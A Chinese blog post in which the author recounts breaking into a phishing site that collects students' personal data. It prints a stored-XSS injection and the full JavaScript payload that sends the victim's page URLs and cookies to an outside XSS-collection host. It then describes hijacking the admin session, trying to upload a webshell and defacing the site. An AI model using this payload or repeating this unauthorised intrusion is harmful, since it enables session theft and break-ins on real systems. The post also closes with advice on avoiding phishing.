XSS经典漏洞复现-手撕某非法获取个人信息网站

#记一次手动入侵某个非法获取个人信息网站

想到诈骗分子现在还是这么猖狂,居然把非法获取个人信息的二维码发到我的眼前,这我又怎么能忍~这不得想办法打掉他.随便做一下网络安全科普,当然了,自己也还是在学习的小白.

scode type="red"

声明:以下仅为一次简单的记录,提供思路及过程,仅供学习交流,请不要用于非法用途,由此教程产生的法律问题均与本人无关！

/scode

##0x01

和往常一样正常打开QQ，无意间看到群消息有这么一个文档.undefined，出于本能,这肯定是个钓鱼网站...那就扫进去看看究竟有什么猫腻.undefined，可以看到，扫进去之后是这么一个页面。吐槽一下这网站做得一眼假好吧。。但是上当受骗的人还是很多。

##0x02

为了先了解一下网站结构，先随便输入信息提交吧。undefined，随便输入账号密码,进入到undefined，一样随便输入一些符合规则的文字进去。成功提交.网站返回。基本就是这么一个流程

##0x03

###漏洞复现

只要用户能输入的地方大部分都存在xss漏洞,其中储存型漏洞伤害较大。在输入框这里输入js代码,可用src引入引入自己的代码，undefined

~~~javascript

<div style="display:none"><script src=http://xsscom.com//Wn7zcb></script></div>

~~~

其中引入的具体代码如下

~~~javascript

(function(){(new Image()).src='http://xsscom.com/index.php?do=api&id=Wn7zcb&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

if(''==1){keep=new Image();keep.src='http://xsscom.com/index.php?do=keepsession&id=Wn7zcb&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

~~~

利用的是后台直接输出用户输出的内容，浏览器直接执行用户输入的恶意木马，能够document.cookie,当后台执行我插入的木马之后,就会发送后台地址以及token到我这里。没一会儿就中招了。

undefined0$E(BHM2(APAOXI7Q.png

可以看到后台地址,对方的ip以及ua信息，cookie。成功进入后台

![%XR(}UC6LLCBNCS4C3$BVN.png，

可以看到很多大学生的信息...而且很多条，并且它有很多个网站，所以收集了大量信息，并且又利用被获取的继续发送，广泛传播。原本想在这个上传点传入大马getshell的，但是一直没能成功，图片马也不能解析。因此没有获取到服务器。只能挂个黑页了

![(W1D5}V{044US$`653C$WO.png

scode type="green"

所有呢在最后我希望你们不要看到获取信息的输入框就输入自己的个人信息，也不要随便扫二维码。在打开未知的网站前可以去去工信部查询对方网站是否为备案以及有相应的运行资质。政府网站后缀统一为gov.cn,学校网站后缀统一为edu.cn后缀等

/scode

我的博客即将同步至腾讯云+社区，邀请大家一同入驻：https://cloud.tencent.com/developer/support-plan?invite_code=qpwmu9jb7yaa